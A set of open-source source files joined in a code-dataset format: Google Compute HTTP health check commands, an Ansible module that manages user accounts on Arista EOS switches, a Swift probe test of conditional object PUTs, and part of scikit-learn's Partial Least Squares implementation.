'unhealthyThreshold': self._flags.unhealthy_threshold,
'healthyThreshold': self._flags.healthy_threshold,
}
http_health_check_request = (self.api.http_health_checks.insert(
project=http_health_check_context['project'],
body=http_health_check_resource))
return http_health_check_request.execute()
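  # Editor's sketch (hedged, not part of gcutil): with all flags left at their
  # defaults, the insert body built above looks roughly like
  #   {'kind': ..., 'name': 'my-check', 'description': '', 'host': '',
  #    'requestPath': '/', 'port': 80, 'checkIntervalSec': 5, 'timeoutSec': 5,
  #    'unhealthyThreshold': 2, 'healthyThreshold': 2}
  # where the check name is an invented example.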
class UpdateHttpHealthCheck(HttpHealthCheckCommand):
"""Update an HTTP health check to handle network load balancing.
    Any fields left unset will keep their original value.
"""
positional_args = '<http-health-check-name>'
safety_prompt = 'Update HTTP health check'
def __init__(self, name, flag_values):
super(UpdateHttpHealthCheck, self).__init__(name, flag_values)
flags.DEFINE_string('description',
None,
'An optional HTTP health check description.',
flag_values=flag_values)
flags.DEFINE_string('host',
None,
'Specifies a new value of the host header used in '
'this HTTP health check request.',
flag_values=flag_values)
flags.DEFINE_string('request_path',
None,
'Specifies a new request path of the HTTP health '
'check request.',
flag_values=flag_values)
flags.DEFINE_string('port',
None,
'Specifies a new TCP port of the HTTP health check '
'request.',
flag_values=flag_values)
flags.DEFINE_integer('check_interval_sec',
None,
'Specifies how often, in seconds, to send a health '
'check.',
flag_values=flag_values)
flags.DEFINE_integer('check_timeout_sec',
None,
'Specifies how long to wait, in seconds, before '
'the health check is considered a failure for each '
'individual instance.',
flag_values=flag_values)
flags.DEFINE_integer('unhealthy_threshold',
None,
'Specifies how many consecutive health check '
'failures must happen before a previously healthy VM '
'is marked unhealthy.',
flag_values=flag_values)
flags.DEFINE_integer('healthy_threshold',
None,
'Specifies how many consecutive health check '
'successes must happen before a previously unhealthy '
'VM will be marked healthy.',
flag_values=flag_values)
def Handle(self, http_health_check_name):
"""Modify the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to modify.
Returns:
The result of modifying the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_hc_resource = {
'kind': self._GetResourceApiKind('httpHealthCheck'),
}
if self._flags.description is not None:
http_hc_resource['description'] = self._flags.description
if self._flags.host is not None:
http_hc_resource['host'] = self._flags.host
if self._flags.request_path is not None:
http_hc_resource['requestPath'] = self._flags.request_path
if self._flags.port is not None:
http_hc_resource['port'] = self._flags.port
if self._flags.check_interval_sec is not None:
http_hc_resource['checkIntervalSec'] = self._flags.check_interval_sec
if self._flags.check_timeout_sec is not None:
http_hc_resource['timeoutSec'] = self._flags.check_timeout_sec
if self._flags.unhealthy_threshold is not None:
http_hc_resource['unhealthyThreshold'] = self._flags.unhealthy_threshold
if self._flags.healthy_threshold is not None:
http_hc_resource['healthyThreshold'] = self._flags.healthy_threshold
http_health_check_request = (self.api.http_health_checks.patch(
httpHealthCheck=http_health_check_context['httpHealthCheck'],
project=http_health_check_context['project'], body=http_hc_resource))
return http_health_check_request.execute()
class GetHttpHealthCheck(HttpHealthCheckCommand):
"""Get an HTTP health check."""
positional_args = '<http-health-check-name>'
def __init__(self, name, flag_values):
super(GetHttpHealthCheck, self).__init__(name, flag_values)
def Handle(self, http_health_check_name):
"""Get the specified HTTP health check.
Args:
http_health_check_name: The name of the HTTP health check to get.
Returns:
The result of getting the HTTP health check.
"""
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', http_health_check_name)
http_health_check_request = self.api.http_health_checks.get(
project=http_health_check_context['project'],
httpHealthCheck=http_health_check_context['httpHealthCheck'])
return http_health_check_request.execute()
class DeleteHttpHealthCheck(HttpHealthCheckCommand):
"""Delete one or more HTTP health checks.
If multiple HTTP health check names are specified, the HTTP health checks
will be deleted in parallel.
"""
positional_args = '<http-health-check-name-1> ... <http-health-check-name-n>'
safety_prompt = 'Delete HTTP health check'
def __init__(self, name, flag_values):
super(DeleteHttpHealthCheck, self).__init__(name, flag_values)
def Handle(self, *http_health_check_names):
"""Delete the specified HTTP health checks.
Args:
*http_health_check_names: The names of the HTTP health checks to delete.
Returns:
Tuple (results, exceptions) - results of deleting the HTTP health checks.
"""
requests = []
for name in http_health_check_names:
http_health_check_context = self._context_parser.ParseContextOrPrompt(
'httpHealthChecks', name)
requests.append(self.api.http_health_checks.delete(
project=http_health_check_context['project'],
httpHealthCheck=http_health_check_context['httpHealthCheck']))
results, exceptions = self.ExecuteRequests(requests)
return (self.MakeListResult(results, 'operationList'), exceptions)
class ListHttpHealthChecks(HttpHealthCheckCommand,
command_base.GoogleComputeListCommand):
"""List the HTTP health checks for a project."""
def ListFunc(self):
"""Returns the function for listing HTTP health checks."""
return self.api.http_health_checks.list
def AddCommands():
appcommands.AddCmd('addhttphealthcheck', AddHttpHealthCheck)
appcommands.AddCmd('gethttphealthcheck', GetHttpHealthCheck)
appcommands.AddCmd('deletehttphealthcheck', DeleteHttpHealthCheck)
appcommands.AddCmd('listhttphealthchecks', ListHttpHealthChecks)
appcommands.AddCmd('updatehttphealthcheck', UpdateHttpHealthCheck)
| gpl-3.0 |
Inspq/ansible | lib/ansible/modules/network/eos/eos_user.py | 1 | 11534 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: eos_user
version_added: "2.3"
author: "Peter Sprygada (@privateip)"
short_description: Manage the collection of local users on EOS devices
description:
- This module provides declarative management of the local usernames
configured on Arista EOS devices. It allows playbooks to manage
either individual usernames or the collection of usernames in the
current running config. It also supports purging usernames from the
configuration that are not explicitly defined.
extends_documentation_fragment: eos
options:
users:
description:
- The set of username objects to be configured on the remote
Arista EOS device. The list entries can either be the username
or a hash of username and properties. This argument is mutually
exclusive with the C(username) argument.
username:
description:
- The username to be configured on the remote Arista EOS
        device. This argument accepts a string value and is mutually
        exclusive with the C(users) argument.
        Please note that this option is not the same as C(provider username).
update_password:
description:
- Since passwords are encrypted in the device running config, this
argument will instruct the module when to change the password. When
set to C(always), the password will always be updated in the device
and when set to C(on_create) the password will be updated only if
the username is created.
default: always
choices: ['on_create', 'always']
privilege:
description:
- The C(privilege) argument configures the privilege level of the
user when logged into the system. This argument accepts integer
values in the range of 1 to 15.
role:
description:
- Configures the role for the username in the
device running configuration. The argument accepts a string value
defining the role name. This argument does not check if the role
has been configured on the device.
sshkey:
description:
- Specifies the SSH public key to configure
for the given username. This argument accepts a valid SSH key value.
nopassword:
description:
- Defines the username without assigning
a password. This will allow the user to login to the system
without being authenticated by a password.
type: bool
purge:
description:
- Instructs the module to consider the
resource definition absolute. It will remove any previously
configured usernames on the device with the exception of the
`admin` user which cannot be deleted per EOS constraints.
type: bool
default: false
state:
description:
- Configures the state of the username definition
as it relates to the device operational configuration. When set
to I(present), the username(s) should be configured in the device active
configuration and when set to I(absent) the username(s) should not be
in the device active configuration
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
eos_user:
username: ansible
sshkey: "{{ lookup('file', '~/.ssh/id_rsa.pub') }}"
state: present
- name: remove all users except admin
eos_user:
purge: yes
- name: set multiple users to privilege level 15
eos_user:
users:
- username: netop
- username: netend
privilege: 15
state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password
- username admin secret admin
session_name:
description: The EOS config session name used to load the configuration
returned: when changed is True
type: str
sample: ansible_1479315771
"""
import re
from functools import partial
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.eos import get_config, load_config
from ansible.module_utils.six import iteritems
from ansible.module_utils.eos import eos_argument_spec, check_args
def validate_privilege(value, module):
if not 1 <= value <= 15:
module.fail_json(msg='privilege must be between 1 and 15, got %s' % value)
def map_obj_to_commands(updates, module):
commands = list()
state = module.params['state']
update_password = module.params['update_password']
for update in updates:
want, have = update
needs_update = lambda x: want.get(x) and (want.get(x) != have.get(x))
add = lambda x: commands.append('username %s %s' % (want['username'], x))
if want['state'] == 'absent':
commands.append('no username %s' % want['username'])
continue
if needs_update('role'):
add('role %s' % want['role'])
if needs_update('privilege'):
add('privilege %s' % want['privilege'])
if needs_update('password'):
if update_password == 'always' or not have:
add('secret %s' % want['password'])
if needs_update('sshkey'):
add('sshkey %s' % want['sshkey'])
if needs_update('nopassword'):
if want['nopassword']:
add('nopassword')
else:
add('no username %s nopassword' % want['username'])
return commands
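# Editor's sketch (hedged, not part of the module): for a single update pair
# the function emits only the attributes that differ, e.g. (values invented)
#   want = {'username': 'netop', 'state': 'present', 'privilege': 15,
#           'role': None, 'password': None, 'sshkey': None,
#           'nopassword': None}
#   have = {'username': 'netop', 'state': 'present', 'privilege': 1}
# would produce the single command 'username netop privilege 15'.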
def parse_role(data):
match = re.search(r'role (\S+)', data, re.M)
if match:
return match.group(1)
def parse_sshkey(data):
match = re.search(r'sshkey (.+)$', data, re.M)
if match:
return match.group(1)
def parse_privilege(data):
match = re.search(r'privilege (\S+)', data, re.M)
if match:
return int(match.group(1))
def map_config_to_obj(module):
data = get_config(module, flags=['section username'])
match = re.findall(r'^username (\S+)', data, re.M)
if not match:
return list()
instances = list()
for user in set(match):
regex = r'username %s .+$' % user
        cfg = re.findall(regex, data, re.M)
cfg = '\n'.join(cfg)
obj = {
'username': user,
'state': 'present',
'nopassword': 'nopassword' in cfg,
'password': None,
'sshkey': parse_sshkey(cfg),
'privilege': parse_privilege(cfg),
'role': parse_role(cfg)
}
instances.append(obj)
return instances
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
users = module.params['users']
if not users:
if not module.params['username'] and module.params['purge']:
return list()
elif not module.params['username']:
module.fail_json(msg='username is required')
else:
collection = [{'username': module.params['username']}]
else:
collection = list()
for item in users:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'username' not in item:
module.fail_json(msg='username is required')
else:
collection.append(item)
objects = list()
for item in collection:
get_value = partial(get_param_value, item=item, module=module)
item['password'] = get_value('password')
item['nopassword'] = get_value('nopassword')
item['privilege'] = get_value('privilege')
item['role'] = get_value('role')
item['sshkey'] = get_value('sshkey')
item['state'] = get_value('state')
objects.append(item)
return objects
def update_objects(want, have):
updates = list()
for entry in want:
item = next((i for i in have if i['username'] == entry['username']), None)
if all((item is None, entry['state'] == 'present')):
updates.append((entry, {}))
elif item:
for key, value in iteritems(entry):
if value and value != item[key]:
updates.append((entry, item))
return updates
def main():
""" main entry point for module execution
"""
argument_spec = dict(
users=dict(type='list'),
username=dict(),
password=dict(no_log=True),
nopassword=dict(type='bool'),
update_password=dict(default='always', choices=['on_create', 'always']),
privilege=dict(type='int'),
role=dict(),
sshkey=dict(),
purge=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(eos_argument_spec)
mutually_exclusive = [('username', 'users')]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(update_objects(want, have), module)
if module.params['purge']:
want_users = [x['username'] for x in want]
have_users = [x['username'] for x in have]
for item in set(have_users).difference(want_users):
if item != 'admin':
commands.append('no username %s' % item)
result['commands'] = commands
# the eos cli prevents this by rule so capture it and display
# a nice failure message
if 'no username admin' in commands:
module.fail_json(msg='cannot delete the `admin` account')
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
swiftstack/swift | test/probe/test_object_conditional_requests.py | 3 | 2859 | # Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from swift.common.manager import Manager
from swiftclient import client
from test.probe.brain import BrainSplitter
from test.probe.common import ReplProbeTest
def chunker(body):
'''Helper to ensure swiftclient sends a chunked request.'''
yield body
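# Editor's note (hedged, not in the original test): a generator body has no
# length, so swiftclient cannot set Content-Length up front and falls back to
# Transfer-Encoding: chunked, which is the case the chunked tests below cover.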
class TestPutIfNoneMatchRepl(ReplProbeTest):
def setUp(self):
super(TestPutIfNoneMatchRepl, self).setUp()
self.container_name = 'container-%s' % uuid.uuid4()
self.object_name = 'object-%s' % uuid.uuid4()
self.brain = BrainSplitter(self.url, self.token, self.container_name,
self.object_name, 'object',
policy=self.policy)
def _do_test(self, overwrite_contents):
self.brain.put_container()
self.brain.stop_primary_half()
# put object to only 1 of 3 primaries
self.brain.put_object(contents=b'VERIFY')
self.brain.start_primary_half()
# Restart services and attempt to overwrite
with self.assertRaises(client.ClientException) as exc_mgr:
self.brain.put_object(headers={'If-None-Match': '*'},
contents=overwrite_contents)
self.assertEqual(exc_mgr.exception.http_status, 412)
# make sure we're GETting from the servers that missed the original PUT
self.brain.stop_handoff_half()
# verify the PUT did not complete
with self.assertRaises(client.ClientException) as exc_mgr:
client.get_object(
self.url, self.token, self.container_name, self.object_name)
self.assertEqual(exc_mgr.exception.http_status, 404)
# for completeness, run replicators...
Manager(['object-replicator']).once()
# ...and verify the object was not overwritten
_headers, body = client.get_object(
self.url, self.token, self.container_name, self.object_name)
self.assertEqual(body, b'VERIFY')
def test_content_length_nonzero(self):
self._do_test(b'OVERWRITE')
def test_content_length_zero(self):
self._do_test(b'')
def test_chunked(self):
self._do_test(chunker(b'OVERWRITE'))
def test_chunked_empty(self):
self._do_test(chunker(b''))
| apache-2.0 |
yask123/scikit-learn | sklearn/cross_decomposition/pls_.py | 187 | 28507 | """
The :mod:`sklearn.pls` module implements Partial Least Squares (PLS).
"""
# Author: Edouard Duchesnay <edouard.duchesnay@cea.fr>
# License: BSD 3 clause
from ..base import BaseEstimator, RegressorMixin, TransformerMixin
from ..utils import check_array, check_consistent_length
from ..externals import six
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import linalg
from ..utils import arpack
from ..utils.validation import check_is_fitted
__all__ = ['PLSCanonical', 'PLSRegression', 'PLSSVD']
def _nipals_twoblocks_inner_loop(X, Y, mode="A", max_iter=500, tol=1e-06,
norm_y_weights=False):
"""Inner loop of the iterative NIPALS algorithm.
Provides an alternative to the svd(X'Y); returns the first left and right
singular vectors of X'Y. See PLS for the meaning of the parameters. It is
    similar to the Power method for determining the eigenvectors and
    eigenvalues of X'Y.
"""
y_score = Y[:, [0]]
x_weights_old = 0
ite = 1
X_pinv = Y_pinv = None
eps = np.finfo(X.dtype).eps
# Inner loop of the Wold algo.
while True:
# 1.1 Update u: the X weights
if mode == "B":
if X_pinv is None:
X_pinv = linalg.pinv(X) # compute once pinv(X)
x_weights = np.dot(X_pinv, y_score)
else: # mode A
# Mode A regress each X column on y_score
x_weights = np.dot(X.T, y_score) / np.dot(y_score.T, y_score)
# 1.2 Normalize u
x_weights /= np.sqrt(np.dot(x_weights.T, x_weights)) + eps
# 1.3 Update x_score: the X latent scores
x_score = np.dot(X, x_weights)
# 2.1 Update y_weights
if mode == "B":
if Y_pinv is None:
Y_pinv = linalg.pinv(Y) # compute once pinv(Y)
y_weights = np.dot(Y_pinv, x_score)
else:
# Mode A regress each Y column on x_score
y_weights = np.dot(Y.T, x_score) / np.dot(x_score.T, x_score)
# 2.2 Normalize y_weights
if norm_y_weights:
y_weights /= np.sqrt(np.dot(y_weights.T, y_weights)) + eps
# 2.3 Update y_score: the Y latent scores
y_score = np.dot(Y, y_weights) / (np.dot(y_weights.T, y_weights) + eps)
# y_score = np.dot(Y, y_weights) / np.dot(y_score.T, y_score) ## BUG
x_weights_diff = x_weights - x_weights_old
if np.dot(x_weights_diff.T, x_weights_diff) < tol or Y.shape[1] == 1:
break
if ite == max_iter:
warnings.warn('Maximum number of iterations reached')
break
x_weights_old = x_weights
ite += 1
return x_weights, y_weights, ite
def _svd_cross_product(X, Y):
C = np.dot(X.T, Y)
U, s, Vh = linalg.svd(C, full_matrices=False)
u = U[:, [0]]
v = Vh.T[:, [0]]
return u, v
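# Editor's sketch (hedged, not part of scikit-learn): on centered data the
# NIPALS inner loop above acts as a power method on X'Y, so its x-weights
# should match the first left singular vector from _svd_cross_product up to
# sign; the shapes and tolerance below are illustrative.
def _example_compare_nipals_svd():
    rng = np.random.RandomState(0)
    X = rng.randn(20, 5)
    Y = rng.randn(20, 3)
    X -= X.mean(axis=0)
    Y -= Y.mean(axis=0)
    u_nipals, _, _ = _nipals_twoblocks_inner_loop(X, Y)
    u_svd, _ = _svd_cross_product(X, Y)
    sign = np.sign(np.dot(u_nipals.T, u_svd))  # align arbitrary sign
    return np.allclose(u_nipals, sign * u_svd, atol=1e-5)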
def _center_scale_xy(X, Y, scale=True):
""" Center X, Y and scale if the scale parameter==True
Returns
-------
X, Y, x_mean, y_mean, x_std, y_std
"""
# center
x_mean = X.mean(axis=0)
X -= x_mean
y_mean = Y.mean(axis=0)
Y -= y_mean
# scale
if scale:
x_std = X.std(axis=0, ddof=1)
x_std[x_std == 0.0] = 1.0
X /= x_std
y_std = Y.std(axis=0, ddof=1)
y_std[y_std == 0.0] = 1.0
Y /= y_std
else:
x_std = np.ones(X.shape[1])
y_std = np.ones(Y.shape[1])
return X, Y, x_mean, y_mean, x_std, y_std
class _PLS(six.with_metaclass(ABCMeta), BaseEstimator, TransformerMixin,
RegressorMixin):
"""Partial Least Squares (PLS)
This class implements the generic PLS algorithm, constructors' parameters
allow to obtain a specific implementation such as:
- PLS2 regression, i.e., PLS 2 blocks, mode A, with asymmetric deflation
and unnormalized y weights such as defined by [Tenenhaus 1998] p. 132.
With univariate response it implements PLS1.
- PLS canonical, i.e., PLS 2 blocks, mode A, with symmetric deflation and
normalized y weights such as defined by [Tenenhaus 1998] (p. 132) and
[Wegelin et al. 2000]. This parametrization implements the original Wold
algorithm.
We use the terminology defined by [Wegelin et al. 2000].
This implementation uses the PLS Wold 2 blocks algorithm based on two
nested loops:
        (i) The outer loop iterates over components.
        (ii) The inner loop estimates the weight vectors. This can be done
        with two algorithms: (a) the inner loop of the original NIPALS
        algorithm, or (b) an SVD on the residual cross-covariance matrices.
n_components : int, number of components to keep. (default 2).
scale : boolean, scale data? (default True)
deflation_mode : str, "canonical" or "regression". See notes.
mode : "A" classical PLS and "B" CCA. See notes.
norm_y_weights: boolean, normalize Y weights to one? (default False)
algorithm : string, "nipals" or "svd"
The algorithm used to estimate the weights. It will be called
n_components times, i.e. once for each iteration of the outer loop.
max_iter : an integer, the maximum number of iterations (default 500)
of the NIPALS inner loop (used only if algorithm="nipals")
tol : non-negative real, default 1e-06
The tolerance used in the iterative algorithm.
copy : boolean, default True
        Whether the deflation should be done on a copy. Leave the default
        set to True unless you don't care about side effects.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
coef_: array, [p, q]
The coefficients of the linear model: ``Y = X coef_ + Err``
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component. Not useful if the algorithm given is "svd".
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
In French but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
See also
--------
PLSCanonical
PLSRegression
CCA
PLS_SVD
"""
@abstractmethod
def __init__(self, n_components=2, scale=True, deflation_mode="regression",
mode="A", algorithm="nipals", norm_y_weights=False,
max_iter=500, tol=1e-06, copy=True):
self.n_components = n_components
self.deflation_mode = deflation_mode
self.mode = mode
self.norm_y_weights = norm_y_weights
self.scale = scale
self.algorithm = algorithm
self.max_iter = max_iter
self.tol = tol
self.copy = copy
def fit(self, X, Y):
"""Fit model to data.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
            Training vectors, where n_samples is the number of samples and
            n_features is the number of predictors.
        Y : array-like of response, shape = [n_samples, n_targets]
            Target vectors, where n_samples is the number of samples and
n_targets is the number of response variables.
"""
# copy since this will contains the residuals (deflated) matrices
check_consistent_length(X, Y)
X = check_array(X, dtype=np.float64, copy=self.copy)
Y = check_array(Y, dtype=np.float64, copy=self.copy, ensure_2d=False)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
n = X.shape[0]
p = X.shape[1]
q = Y.shape[1]
if self.n_components < 1 or self.n_components > p:
raise ValueError('Invalid number of components: %d' %
self.n_components)
if self.algorithm not in ("svd", "nipals"):
raise ValueError("Got algorithm %s when only 'svd' "
"and 'nipals' are known" % self.algorithm)
if self.algorithm == "svd" and self.mode == "B":
raise ValueError('Incompatible configuration: mode B is not '
'implemented with svd algorithm')
if self.deflation_mode not in ["canonical", "regression"]:
raise ValueError('The deflation mode is unknown')
# Scale (in place)
X, Y, self.x_mean_, self.y_mean_, self.x_std_, self.y_std_\
= _center_scale_xy(X, Y, self.scale)
# Residuals (deflated) matrices
Xk = X
Yk = Y
# Results matrices
self.x_scores_ = np.zeros((n, self.n_components))
self.y_scores_ = np.zeros((n, self.n_components))
self.x_weights_ = np.zeros((p, self.n_components))
self.y_weights_ = np.zeros((q, self.n_components))
self.x_loadings_ = np.zeros((p, self.n_components))
self.y_loadings_ = np.zeros((q, self.n_components))
self.n_iter_ = []
# NIPALS algo: outer loop, over components
for k in range(self.n_components):
if np.all(np.dot(Yk.T, Yk) < np.finfo(np.double).eps):
# Yk constant
warnings.warn('Y residual constant at iteration %s' % k)
break
# 1) weights estimation (inner loop)
# -----------------------------------
if self.algorithm == "nipals":
x_weights, y_weights, n_iter_ = \
_nipals_twoblocks_inner_loop(
X=Xk, Y=Yk, mode=self.mode, max_iter=self.max_iter,
tol=self.tol, norm_y_weights=self.norm_y_weights)
self.n_iter_.append(n_iter_)
elif self.algorithm == "svd":
x_weights, y_weights = _svd_cross_product(X=Xk, Y=Yk)
# compute scores
x_scores = np.dot(Xk, x_weights)
if self.norm_y_weights:
y_ss = 1
else:
y_ss = np.dot(y_weights.T, y_weights)
y_scores = np.dot(Yk, y_weights) / y_ss
# test for null variance
if np.dot(x_scores.T, x_scores) < np.finfo(np.double).eps:
warnings.warn('X scores are null at iteration %s' % k)
break
# 2) Deflation (in place)
# ----------------------
            # Possible memory footprint reduction may be done here: in order
            # to avoid allocating a data chunk for the rank-one approximations
            # matrix which is then subtracted from Xk, we suggest performing
            # a column-wise deflation.
#
# - regress Xk's on x_score
x_loadings = np.dot(Xk.T, x_scores) / np.dot(x_scores.T, x_scores)
# - subtract rank-one approximations to obtain remainder matrix
Xk -= np.dot(x_scores, x_loadings.T)
if self.deflation_mode == "canonical":
# - regress Yk's on y_score, then subtract rank-one approx.
y_loadings = (np.dot(Yk.T, y_scores)
/ np.dot(y_scores.T, y_scores))
Yk -= np.dot(y_scores, y_loadings.T)
if self.deflation_mode == "regression":
# - regress Yk's on x_score, then subtract rank-one approx.
y_loadings = (np.dot(Yk.T, x_scores)
/ np.dot(x_scores.T, x_scores))
Yk -= np.dot(x_scores, y_loadings.T)
# 3) Store weights, scores and loadings # Notation:
self.x_scores_[:, k] = x_scores.ravel() # T
self.y_scores_[:, k] = y_scores.ravel() # U
self.x_weights_[:, k] = x_weights.ravel() # W
self.y_weights_[:, k] = y_weights.ravel() # C
self.x_loadings_[:, k] = x_loadings.ravel() # P
self.y_loadings_[:, k] = y_loadings.ravel() # Q
# Such that: X = TP' + Err and Y = UQ' + Err
# 4) rotations from input space to transformed space (scores)
# T = X W(P'W)^-1 = XW* (W* : p x k matrix)
# U = Y C(Q'C)^-1 = YC* (W* : q x k matrix)
self.x_rotations_ = np.dot(
self.x_weights_,
linalg.pinv(np.dot(self.x_loadings_.T, self.x_weights_)))
if Y.shape[1] > 1:
self.y_rotations_ = np.dot(
self.y_weights_,
linalg.pinv(np.dot(self.y_loadings_.T, self.y_weights_)))
else:
self.y_rotations_ = np.ones(1)
if True or self.deflation_mode == "regression":
# FIXME what's with the if?
# Estimate regression coefficient
# Regress Y on T
# Y = TQ' + Err,
# Then express in function of X
# Y = X W(P'W)^-1Q' + Err = XB + Err
# => B = W*Q' (p x q)
self.coef_ = np.dot(self.x_rotations_, self.y_loadings_.T)
self.coef_ = (1. / self.x_std_.reshape((p, 1)) * self.coef_ *
self.y_std_)
return self
def transform(self, X, Y=None, copy=True):
"""Apply the dimension reduction learned on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
            Training vectors, where n_samples is the number of samples and
            p is the number of predictors.
        Y : array-like of response, shape = [n_samples, q], optional
            Training vectors, where n_samples is the number of samples and
q is the number of response variables.
copy : boolean, default True
Whether to copy X and Y, or perform in-place normalization.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
check_is_fitted(self, 'x_mean_')
X = check_array(X, copy=copy)
# Normalize
X -= self.x_mean_
X /= self.x_std_
# Apply rotation
x_scores = np.dot(X, self.x_rotations_)
if Y is not None:
Y = check_array(Y, ensure_2d=False, copy=copy)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
Y -= self.y_mean_
Y /= self.y_std_
y_scores = np.dot(Y, self.y_rotations_)
return x_scores, y_scores
return x_scores
def predict(self, X, copy=True):
"""Apply the dimension reduction learned on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
            Training vectors, where n_samples is the number of samples and
p is the number of predictors.
copy : boolean, default True
Whether to copy X and Y, or perform in-place normalization.
Notes
-----
This call requires the estimation of a p x q matrix, which may
be an issue in high dimensional space.
"""
check_is_fitted(self, 'x_mean_')
X = check_array(X, copy=copy)
# Normalize
X -= self.x_mean_
X /= self.x_std_
Ypred = np.dot(X, self.coef_)
return Ypred + self.y_mean_
def fit_transform(self, X, y=None, **fit_params):
"""Learn and apply the dimension reduction on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
            Training vectors, where n_samples is the number of samples and
            p is the number of predictors.
        Y : array-like of response, shape = [n_samples, q], optional
            Training vectors, where n_samples is the number of samples and
q is the number of response variables.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
        return self.fit(X, y, **fit_params).transform(X, y)
class PLSRegression(_PLS):
"""PLS regression
PLSRegression implements the PLS 2 blocks regression known as PLS2 or PLS1
in case of one dimensional response.
This class inherits from _PLS with mode="A", deflation_mode="regression",
norm_y_weights=False and algorithm="nipals".
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, (default 2)
Number of components to keep.
scale : boolean, (default True)
whether to scale the data
max_iter : an integer, (default 500)
the maximum number of iterations of the NIPALS inner loop (used
only if algorithm="nipals")
tol : non-negative real
Tolerance used in the iterative algorithm default 1e-06.
copy : boolean, default True
        Whether the deflation should be done on a copy. Leave the default
        set to True unless you don't care about side effects.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
coef_: array, [p, q]
The coefficients of the linear model: ``Y = X coef_ + Err``
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component.
Notes
-----
For each component k, find weights u, v that optimizes:
    ``max corr(Xk u, Yk v) * var(Xk u) var(Yk v)``, such that ``|u| = 1``
Note that it maximizes both the correlations between the scores and the
intra-block variances.
The residual matrix of X (Xk+1) block is obtained by the deflation on
the current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current X score. This performs the PLS regression known as PLS2. This
mode is prediction oriented.
This implementation provides the same results that 3 PLS packages
provided in the R language (R-project):
- "mixOmics" with function pls(X, Y, mode = "regression")
- "plspm " with function plsreg2(X, Y)
- "pls" with function oscorespls.fit(X, Y)
Examples
--------
>>> from sklearn.cross_decomposition import PLSRegression
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [2.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
